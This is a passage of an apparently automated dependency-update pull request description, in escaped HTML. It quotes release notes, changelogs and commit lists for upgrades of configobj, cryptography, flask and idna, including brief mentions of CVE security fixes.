Releases\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRelease 5.0.6 improves error messages in certain edge cases\u003c/li\u003e\n\u003cli\u003eRelease 5.0.5 corrects a unicode-bug that still existed in writing files\u003c/li\u003e\n\u003cli\u003eRelease 5.0.4 corrects a unicode-bug that still existed in reading files after\nfixing lists of string in 5.0.3\u003c/li\u003e\n\u003cli\u003eRelease 5.0.3 corrects errors related to the incorrectly handling unicode\nencoding and writing out files\u003c/li\u003e\n\u003cli\u003eRelease 5.0.2 adds a specific error message when trying to install on\nPython versions older than 2.5\u003c/li\u003e\n\u003cli\u003eRelease 5.0.1 fixes a regression with unicode conversion not happening\nin certain cases PY2\u003c/li\u003e\n\u003cli\u003eRelease 5.0.0 updates the supported Python versions to 2.6, 2.7, 3.2, 3.3\nand is otherwise unchanged\u003c/li\u003e\n\u003cli\u003eRelease 4.7.2 fixes several bugs in 4.7.1\u003c/li\u003e\n\u003cli\u003eRelease 4.7.1 fixes a bug with the deprecated options keyword in 4.7.0.\u003c/li\u003e\n\u003cli\u003eRelease 4.7.0 improves performance adds features for validation and\nfixes some bugs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/242dfd09510e937574758da76ddc644b71f8cc4f\"\u003e\u003ccode\u003e242dfd0\u003c/code\u003e\u003c/a\u003e release 5.0.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/8857b0882539cb2c5aef8a0061aec78004a47ccb\"\u003e\u003ccode\u003e8857b08\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/246\"\u003e#246\u003c/a\u003e from DiffSK/python-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/d6f7597df5ff4f91081c0d9329db1d8cbc0990f8\"\u003e\u003ccode\u003ed6f7597\u003c/code\u003e\u003c/a\u003e Update minimum python to 3.7 everywhere, and add 3.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/8ffcf0c05d3d4a950380d922ba902a08e3e4e853\"\u003e\u003ccode\u003e8ffcf0c\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/241\"\u003e#241\u003c/a\u003e from yegorich/license\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/5e2f14313e7f093e77b53ad4acbb062af6bc8b2b\"\u003e\u003ccode\u003e5e2f143\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/245\"\u003e#245\u003c/a\u003e from jelmer/extra-2014\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/fdf3634418d9acfc72a534b26a796d195c4a7e42\"\u003e\u003ccode\u003efdf3634\u003c/code\u003e\u003c/a\u003e Drop extra '2014' in LICENSE file. Fixes \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/233\"\u003e#233\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/3480a6ee929bdbaa61ec28e325b261d79396b09c\"\u003e\u003ccode\u003e3480a6e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/237\"\u003e#237\u003c/a\u003e from jelmer/drop-python2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/008165c8f200a7c636c9095868c8c540f104eeda\"\u003e\u003ccode\u003e008165c\u003c/code\u003e\u003c/a\u003e Drop python 3.5 from GitHub action, since it now fails to download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/861383cd11dec0c2427724f0993437a1762c2a7a\"\u003e\u003ccode\u003e861383c\u003c/code\u003e\u003c/a\u003e Drop support for Python \u0026lt; 3.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/DiffSK/configobj/commit/7c618b0bbaff6ecaca51a6f05b29795d1377a4a5\"\u003e\u003ccode\u003e7c618b0\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/DiffSK/configobj/issues/236\"\u003e#236\u003c/a\u003e from cdcadman/cve_2023_26112\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/DiffSK/configobj/compare/v5.0.6...v5.0.9\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cryptography` from 2.2.2 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/2.2.2...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 0.12.4 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca href=\"https://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\"\u003ehttps://github.com/pallets/flask/security/advisories/GHSA-m2qf-hxjv-5gpq\u003c/a\u003e, CVE-2023-30861\u003c/li\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-5\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/30?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/30?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.4\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-4\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/27?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/27?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 2.2.x release branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/26?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/26?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/25?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/25?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.2.0\"\u003e2.2.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-1\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/23?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/23?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.2.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release, which includes new features and removes previously deprecated code. The 2.2.x branch is now the supported bug fix branch, the 2.1.x branch will become a tag marking the end of support for that branch. We encourage everyone to upgrade, and to use a tool such as \u003ca href=\"https://pypi.org/project/pip-tools/\"\u003epip-tools\u003c/a\u003e to pin all dependencies and control upgrades.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\"\u003ehttps://flask.palletsprojects.com/en/2.2.x/changes/#version-2-2-0\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/19?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/19?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-3\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/22?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/22?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.2\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/0.12.4...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.6 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 